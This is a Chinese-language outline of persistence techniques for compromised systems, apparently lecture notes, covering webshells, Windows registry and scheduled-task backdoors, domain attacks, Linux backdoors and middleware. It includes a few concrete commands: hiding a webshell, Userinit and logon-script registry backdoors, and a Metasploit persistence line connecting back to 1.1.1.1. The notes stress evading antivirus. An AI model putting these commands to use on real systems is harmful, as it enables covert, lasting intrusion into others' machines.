持久化的一些方法

之前讲了次课准备的，ppt就不放了，当时的思路搬运过来

---

需要思考的几个问题

1 返回路径 (网络出口,网络之间)

2 部署方式及免杀 (个人电脑,服务器,杀软)

3 痕迹清理

 

 

---

---

web相关

1 webshell

attrib +s +h test.php  隐藏test.php文件

attrib命令 用于修改文件属性

+s 设置系统文件属性

+h 设置隐藏属性

.user.ini

auto_append_file = 1.gif

user_ini.cache_ttl = 10

 

auto_append_file    包含要执行的文件

user_ini.cache_ttl  重新读取用户 INI 文件的间隔时间

2 代码修改

 

---

windows

1 程序替换

shift后门

替换不常用服务程序

对于开源软件,重新编译目标使用的程序,比如notepad++,mysql

程序内插入shellcode         shellter

2 rid hijack(账户克隆)

3 注册表映像劫持

Gflags.exe

 

4 自启动

HKCU\Software\Microsoft\Windows\CurrentVersion\Run

msf persistence

run persistence -X -i 5 -p 4445 -r 1.1.1.1

 

缺点：容易被杀软发现

优点：种植容易

注册表路径: HKCU\Environment\

创建字符串键值: UserInitMprLogonScript

键值设置为bat的绝对路径:D:\工作\1.bat

 

因为Logon Scripts是优先于很多杀毒软件启动（部分杀毒是优先于他启动）的，所以可以通过这种方式将powershell命令写到bat脚本中，达到免杀隐藏启动的效果

 

优点：免杀效果比较好

缺点：隐蔽性相对较弱，因为存在后门文件。

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit

 

Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\WINDOWS NT\CurrentVersion\Winlogon" -name Userinit -value "C:\Windows\system32\userinit.exe,xxxxx"

 

这种方法可以实现无文件落地，直接执行powershell命令，并且他也是优于杀毒软件进行启动的

 

缺点：权限要求较高

优点：无文件落地，隐蔽性，免杀性较好。

开始菜单启动项

开始菜单启动项

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

5 计划任务

schtasks.exe /Create /TN update /TR xx(你要执行的命令) /SC ONLOGON /F /RL HIGHEST

不一定要启动时

 

优点：一般杀毒软件不会拦截这条命令

缺点：后门存在于系统当中，并且需要做免杀。

 

6 CLR劫持

优点：无需管理员权限，并能够劫持所有.Net程序。更重要的是,系统默认会调用.net程序,导致后门自动触发

 

7 com对象劫持

劫持CAccPropServicesClass以及MMDeviceEnumerator

优点：相对于CLR劫持.net,此方法无需重启。

系统很多正常程序启动时需要调用这两个实例，所以，这就可以用作后门来使用，并且，该方法也能够绕过Autoruns对启动项的检测。

 

 

MruPidlList

COM对象MruPidlList，作用于shell32.dll，shell32.dll用于打开网页和文件，所以当系统启动时必定会执行

 

8 waitfor

waitfor heheda & echo 1

waitfor /s 1.1.1.1 /si heheda

 

9 office劫持

Office在启动过程中，会自动加载C:\Users\xxx\AppData\Roaming\Microsoft\Word\Startup文件夹中的dll

 

10 junction folder

11 windows库

12 程序插件和扩展

13 DLL劫持

14 wmi事件

 

---

 

windows域相关

1 golden ticket

2 skeleton key

3 dsrm

4 sid history

5 ACL后门

6 silver ticket

7 msdtc加载后门

8 dump hash

9 隐蔽的dcshadow

10 恶意SSP

11 Hook PasswordChangeNotify

---

 

linux

1 计划任务

ehco "*/2 * * * * ./test”>filename.txt 

crontab filename.txt

 

除了最常见的crontab还有

at

anacron

2 ssh软连接后门

3 ssh wrapper

4 rootkit

5 suid shell

6 利用alias

7 pam认证机制后门

8 PROMPT_COMMAND后门

9 写入公钥

10 suid shell

11 inetd.conf

---

 

中间件

1 php扩展后门

2 apache模块后门

3 mysql

4 mssql

5 iis

6 tomcat